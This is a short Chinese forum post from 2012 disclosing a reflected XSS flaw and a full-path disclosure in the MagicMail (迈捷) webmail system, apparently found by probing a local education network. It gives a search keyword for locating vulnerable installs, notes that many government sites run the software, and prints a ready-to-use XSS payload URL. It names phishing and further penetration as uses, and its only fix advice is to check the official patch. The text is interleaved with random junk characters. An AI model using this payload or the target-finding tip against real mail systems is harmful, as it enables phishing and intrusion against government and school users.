今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
, R; s4 e/ L% k+ I z& Z* Q% Z
' U. Z. K2 ]3 B6 l( T0 Z 8 g' Q! t; U3 n5 S M
包含 一个反射性XSS 以及 绝对路径泄漏2 a+ R& {- K1 b3 L
看了看 貌似全部是linux的。
9 Q8 V' @; f1 u7 W+ r1 C
# g4 _1 g; B$ U- W关键字:迈捷邮件系统 by MagicMail
f" Q) j' k3 E9 q; D" S! ^3 I- T
. ^- w/ B) g& a- l# t可以看到很多政府网站都用这个邮件系统
) k+ y% c1 _: P. K: s& J3 z$ \% b, Z5 X, U6 l. b) R% q
绝对路径 http://madman.in/index.php?login_type=declare&language= t2 O8 z, ^( R i% ~1 {
2 U2 M3 _2 X. T2 z" I3 J
; u& y9 D2 [* j* \! p0 B, ]! M, U0 s0 h& M& g5 ]
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
. e/ a4 v7 z9 [. O: J, {+ R& @* f @1 y( S* w) ~$ j* t5 K
" S+ n) |9 K9 w% z
; R+ Y; Y, _3 {! h2 \; ?虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等& n$ I5 ^6 O, W, e( H5 a9 t) E
! H ]; ?- l& O a
修复方案:看官方补丁吧。( z8 r; o M% K% k3 C
|
发表于 2012-11-9 20:38:41
收藏
支持
反对